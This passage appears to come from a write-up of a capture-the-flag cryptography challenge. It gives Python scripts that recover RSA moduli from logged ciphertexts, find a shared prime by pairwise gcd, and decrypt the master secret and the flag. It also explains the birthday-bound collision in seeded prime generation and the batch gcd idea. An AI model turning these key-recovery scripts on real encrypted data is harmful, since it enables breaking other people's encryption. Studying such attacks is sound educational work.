        # Read one "send 2, send 3, backup" round per iteration.
        # At the end of the file readline() returns '' and int() raises,
        # which ends the loop through the except branch below.
        while True:
            f.readline()
            f.readline()
            enc_2 = int(f.readline(),16)
            f.readline()
            enc_3 = int(f.readline(),16)
            f.readline()
            backup = f.readline()
            # gcd of two multiples of n is a small multiple of n
            g = gcd(e2-enc_2, e3-enc_3)
            # Trial division to get rid of the small cofactor
            for i in range(500,1,-1):
                if g % i == 0:
                    g = g // i
            N.append(g)
            BACKUP.append(int(backup,16))
    except Exception as err:
        print(err)
with open("var.py", "w") as f:
    f.write(f"flag= {flag}\n")
    f.write(f"N= {N}\n")
    f.write(f"BACKUP= {BACKUP}")
Now we have a bunch of \(N\)’s and encryptions. We can’t really do Chinese remainder theorem here as \(e=65537\) is too large.
Exercise: Copy the analysis for the long story short part to conclude why Chinese remainder theorem is not feasible in this case.
With so many moduli, what can we do? One thing is to try to check their gcd to find any common factor. If there are any common factors among the moduli, then we can already recover the private exponent and thus the master_secret!
Let’s just use a simple python script to loop through all pairs of moduli and look for any common factors.
from math import gcd
from var import flag, N, BACKUP
from itertools import combinations
from Crypto.Cipher import AES

e = 65537
flag = flag.to_bytes(64, 'big')

def decrypt(n, p, enc):
    q = n // p
    phi = (p-1)*(q-1)
    d = pow(e, -1, phi)
    return pow(enc, d, n)

for enum1, enum2 in combinations(enumerate(N), 2):
    i1, n1 = enum1
    i2, n2 = enum2
    g = gcd(n1, n2)
    if g != 1:
        break

g = gcd(N[i1],N[i2])
dec1 = decrypt(N[i1], g, BACKUP[i1])
dec2 = decrypt(N[i2], g, BACKUP[i2])
assert dec1 == dec2
secret = dec1.to_bytes(32, 'big')
cipher = AES.new(secret, AES.MODE_CBC, b'\0'*16)
dec = cipher.decrypt(flag)
print(dec)
After 8 minutes, we actually get a common factor! So the problem is already solved…
Why is there a common factor? For that we look at the code for parameter generation:
self.key = Key(
    generate_prime(self.master_secret + int.to_bytes(pow(G, id, N), 32, 'big')),
    generate_prime(self.master_secret + int.to_bytes(pow(H, id, N), 32, 'big'))
)

def generate_prime(seed):
    random.seed(seed)
    while True:
        p = random.getrandbits(512) | (1<<511)
        if p % E == 1: continue
        if not is_prime(p): continue
        return p
Since random is seeded by the input and master_secret is fixed, it comes down to whether the latter part is fixed! In this case we are using the function \(f(x) = G^x \bmod N\) (and likewise with \(H\)) for the latter part, where id is random. Since id is a random 256-bit integer and \(N\) is also a 256-bit integer, we might (wrongly) assume that \(G\) and \(H\) are primitive roots mod \(N\); if that were the case, the chance of \(f(x)\) and \(f(y)\) being equal would be quite low.
However, we actually have that:
But \(33554432=2^{25}\), so there are only \(2^{25}\) possibilities! By some math we know that the probability of at least one collision when we have \(16384\) random samples is actually \(1-\frac{33554432!}{33554432^{16384}(33554432-16384)!}\approx 98\%\). (This is the famous birthday problem)
So the primes are basically guaranteed to collide!
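The 98% figure can be reproduced without evaluating any huge factorial. This is a small sketch (the function name `collision_probability` is hypothetical) that sums logarithms of the individual "no collision yet" factors, assuming the \(16384\) samples are uniform over \(33554432\) values.

```python
from math import exp, log1p


def collision_probability(samples, space):
    """P(at least one repeat) among `samples` uniform draws from `space` values."""
    # P(no repeat) = prod_{i=0}^{samples-1} (1 - i/space); work with its logarithm.
    log_no_repeat = sum(log1p(-i / space) for i in range(samples))
    return 1 - exp(log_no_repeat)


probability = collision_probability(16384, 33554432)
print(f"{probability:.4f}")
```

A quick sanity check is the approximation \(1-e^{-k^2/(2d)}\): with \(k=2^{14}\) and \(d=2^{25}\) the exponent is \(-4\), which gives about \(0.98\) as well.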
The flag of this challenge is hkcert21{y0u_d0nt_n33d_p41rw15e_9cd_1f_y0u_c4n_d0_i7_1n_b4tch}. What is batch gcd?
As it turns out, there is a fast algorithm to determine whether (and which) one of the \(N\)’s has a common factor with any of the remaining \(N\)’s. If there is one, then we can already factor one of the moduli. The idea of the algorithm is, for the list \(X=\{x_1,\cdots,x_n\}\) of integers, to compute \[\gcd\left(x_i,\prod_{j\neq i}x_j\right)\text{ for each }i.\]
We just need to precompute the product of all the integers, then invoke gcd \(n\) times (where \(n\) is the number of integers), as opposed to the naive pairwise comparison method, which requires \(\frac{n(n-1)}{2}\) gcd calls. However, as the pairwise method works here, it doesn’t matter.
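A direct sketch of that idea follows. It is the simple version only: the product is computed once and each integer is compared against the product of all the others, whereas production batch-gcd implementations usually add product and remainder trees to avoid the large divisions. The function name and the toy moduli are hypothetical.

```python
from math import gcd, prod


def batch_gcd(numbers):
    """For each x_i, return gcd(x_i, product of all the other x_j)."""
    total = prod(numbers)
    return [gcd(x, total // x) for x in numbers]


# Toy moduli: the first two share the prime 13, the others share nothing.
moduli = [11 * 13, 13 * 17, 19 * 23, 29 * 31]
shared = batch_gcd(moduli)
print(shared)

# Any entry strictly between 1 and the modulus is a non-trivial factor.
for n, g in zip(moduli, shared):
    if 1 < g < n:
        print(f"{n} = {g} * {n // g}")
```

If a modulus shares both of its primes with other moduli, the gcd is the modulus itself, and a pairwise check against the other flagged moduli is still needed for that entry.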
]]>